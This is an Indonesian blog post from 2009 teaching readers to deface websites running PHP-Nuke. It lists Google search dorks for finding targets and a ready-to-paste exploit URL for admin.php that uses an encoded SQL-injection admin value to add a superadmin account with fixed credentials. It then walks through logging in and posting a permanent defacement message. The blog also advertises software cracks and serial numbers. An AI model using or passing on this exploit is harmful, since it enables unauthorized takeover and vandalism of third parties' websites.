Profil MasWafa

Muhammad Wafaul Himam MasWafa didedikasikan untuk alternatif free download software, game, crack, serial number, keygen patch, e-book dan trick hacking cracking, serta naruto movie. Menurut dia, sharing apa yang ditemukannya itu sangat beguna untuk disebarkan kepada teman-teman semua. Untuk lebih jelasnya tentang profil Muhammad Wafaul Himam, lihat profil...
Check Google Page Rank

5 Feature Games

Hot Article !

/

Hot Link

19 November 2009

Deface Site Sederhana

Salah satu teknik hacking yang paling sederhana/mudah yang aku pernah jalani adalah deface web. Dengan menggunakan bug yang ada kita sudah bisa membubuhkan nama kita di web nya orang seperti :


Defaced by MasWafa


Greetz to everyone at CuPu²


Hey admin.. find your hole and close it.



Begitu contohnya dan itu adalah cara yang paling mudah. Apabila kamu ingin tau dan mencobanya silahkan buka halaman lain, tapi kalo mau tau cara deface seperti yang tersebut diatas baca tutornya dibawah ini :

Buka situs google


kemudian ketik keyword nya ==> allinurl:.com/nuke/index.php atau allinurl:.org/nuke/index.php

Nah ..... kalo sudah ketemu targetnya maka langkah selanjutnya adalah :

1. www.target.com/nuke/index.php


2. www.target.com/nuke/index.php ==> index.php tadi dirubah menjadi admin.php


3. Tambahkan bug ini dibelakang situs tadi :

?op=AddAuthor&add_aid=nino&add_name=nno&add_pwd=ninoalone&add_email=nino@linuxmail.org&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox


jadi ketik di url kamu seperti contoh dibawah ini :

www.target.com/nuke/admin.php?op=AddAuthor&add_aid=nino&add_name=nno&add_pwd=ninoalone&add_email=nino@linuxmail.org&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox


4. Kalo berhasil, maka di url/browsing kamu akan muncul : www.target.com/nuke/admin.php?op=mod_author


Kalo gak, berarti situs tsb udah di path ama admin nya.


5. Kalo berhasil, disana kamu di suruh login, masukin id & password kamu tadi. Masih ingat kan ???


id=nino ==> liat point 3 diatas
password=ninoalone ==> liat point 3 diatas


Nah . . . kamu sekarang sudah masuk ke "Administration Menu" situs tsb. Berarti kamu sudah mengusai situs tsb sekarang ! Hehehe...

Sekarang kamu pilih gambar Handphone (dibawahnya ada tulisan Messages), lalu ketik :

title ==>Defaced by NinO
content ==>Hey admin.......find your hole and close it..Greetz to everyone at CuPu²
expiration ==> pilih unlimited trus klik tab add messages yang ada di bawah

Kalo sudah, buka url/browsing baru lalu ketikkan situs target tadi, misal : www.target.com/nuke atau www.target.com/nuke/index.php

kalo nggak ada hasil deface kamu coba klik tab refresh yang ada diatas yg disamping url/browsing kamu.



Top Blogs

Bookmark and Share
Jika sobat merasa artikel Deface Site Sederhana ini sangat bermanfaat,silahkan copas artikel ini, tapi jangan lupa untuk memasang linknya, bukan link mati seperti http://maswafa.blogspot.com/2009/11/deface-site-sederhana.html ini, tapi link hidup seperti http://maswafa.blogspot.com/2009/11/deface-site-sederhana.html ini. Terima kasih.

Artikel Terkait



Komentar :

2 Chat disini to “Deface Site Sederhana”

secangir teh dan sekerat roti mengatakan...
on 

wah, kok serem gitu..?

uda ridwan mengatakan...
on 

garang........tp asik jg kliatanx...

Posting Komentar

Dimohon baca dan pahami terlebih dahulu "Cara Download di MasWafa Blog" ini sebelum komentar.

Silahkan menuliskan komentar anda pada opsi Google/Blogger untuk anda yang memiliki akun Google/Blogger.

Silahkan pilih account yang sesuai dengan blog/website anda (LiveJournal, WordPress, TypePad, AIM).

Pada opsi OpenID silahkan masukkan URL blog/website anda pada kotak yang tersedia.

Atau anda bisa memilih opsi Nama/URL, lalu tulis nama anda dan URL blog/website anda pada kotak yang tersedia, atau juga bisa URL Facebook atau Twitter anda, misal http://facebook.com/wafaulhimam

Gunakan opsi 'Anonim' jika anda tidak ingin mempublikasikan data anda. (sangat tidak disarankan). Jika komentar anda berupa pertanyaan, maka jika anda menggunakan opsi ini pertanyaan anda tidak akan ditanggapi.

 

Tukar Link



Cukup copy text dalam area dan paste dalam blog anda.
Saya akan segera linkback kembali.
MasWafa - Free download software and Reviews | Free Games | Reviews Software | Full Crack | Free Serial Number

Donasi yaa !!!
Lompat ke : Atas | Artikel | Komentar | Artikel Terkait [follow me : @wafaulhimam dan @maswafablog ]